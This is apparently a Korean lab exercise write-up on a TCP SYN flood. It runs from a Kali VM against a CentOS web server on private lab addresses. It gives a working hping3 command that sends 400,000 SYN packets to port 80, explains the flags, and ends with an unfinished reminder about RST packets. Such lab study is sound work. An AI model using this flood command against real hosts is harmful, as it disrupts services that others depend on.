•
모든 실습은 VM Ware 환경에서 진행됩니다
실습환경
공격자 : kali linux
공격자 IP : 192.168.0.138
공격 대상 : Cent OS
사전 준비 : HTTP 서비스 활성화 (80번 포트 Open)
피해자 IP : 192.168.0.135
공격 실행
1) Kali 에서 터미널 실행
hping3 명령어를 이용하여 SYN 패킷 전송
hping3 192.168.0.135 -p 80 -S --faster -c 400000
Bash
복사
•
c 400000 : 40만개 패킷만 보냄
•
p : 목적지 포트 설정
•
S : TCP SYN 패킷을 보냄
2) 공격 대상 PC 에서 Network History 증가 확인
3) Wireshark 로 보낸 패킷 확인
칼리 리눅스의 특성으로 RST 보내는 거 적기